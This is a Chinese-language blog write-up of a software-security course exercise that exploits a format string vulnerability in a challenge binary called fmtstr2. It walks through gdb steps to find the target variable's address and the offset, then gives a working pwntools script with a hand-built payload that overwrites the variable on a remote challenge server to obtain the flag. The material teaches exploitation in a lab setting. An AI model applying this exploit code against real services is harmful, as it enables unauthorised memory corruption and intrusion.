软件安全-课后练习-格式化字符串-fmtstr2-随笔

一、准备工作

题目-百度网盘

1.

软件安全-课后练习-格式化字符串-fmtstr2-随笔_第1张图片

2.代码审计

只要输入不是yes或者no,就会调用到存在格式化字符串漏洞的printf函数
软件安全-课后练习-格式化字符串-fmtstr2-随笔_第2张图片
如果authenticated 的值为1195526213(十六进制:0x47424845),就可以得到flag。
软件安全-课后练习-格式化字符串-fmtstr2-随笔_第3张图片

二、思路:

通过格式化字符串覆盖存储authenticated变量的地址对应的内容为1195526213(十六进制:0x47424845)

三、找到存储authenticated变量值的地址

gdb:

b read_flag
r
# 接下来要输入内容,可随便输入

关键的代码在划线的两行,eax+0x48的值即为存储authenticated变量值的地址
软件安全-课后练习-格式化字符串-fmtstr2-随笔_第4张图片
gdb

ni
ni
ni
ni
ni
ni
ni
ni
p $eax + 0x48

得到存储authenticated变量值的地址:
在这里插入图片描述

四、获得格式化字符串的offset

不理解的话可以看这两篇:
最基础的格式化字符串的原理
通过一道例题

1.让程序执行到call printf

gdb:

b printf
r
# 接下来要输入内容,可随便输入

软件安全-课后练习-格式化字符串-fmtstr2-随笔_第5张图片
返回地址如划线处
gdb:

disas  0x8049560

在这里插入图片描述

d
 b *0x804955b
 r
 # 接下来输入内容,可输入一些比较有特征的数字,这里以AAAABBBBCCCCDDDD为例
 stack 20

2.确定offset

软件安全-课后练习-格式化字符串-fmtstr2-随笔_第6张图片
从第一处划线位置为1开始往下数,第二处划线为11,因此offset为11

五、构造payload

from pwn import *
# context.log_level = "DEBUG"
ifRemote = 1
if ifRemote:
    io = remote("8.134.59.72", 38728)
else:
    io = process("./fmtstr2")
authenticated_addr = 0x0804c048
authenticated_value = 0x47424845
offset = 11
# payload = b'%66c%22$hhn%3c%23$hhn%2c%24$hhn%1c%25$hhnaaaJ\xc0\x04\x08H\xc0\x04\x08K\xc0\x04\x08I\xc0\x04\x08'
payload=fmtstr_payload(offset,{authenticated_addr:authenticated_value})
print(payload)
io.sendline(payload)
io.interactive()

你可能感兴趣的:(软件安全练习题,安全)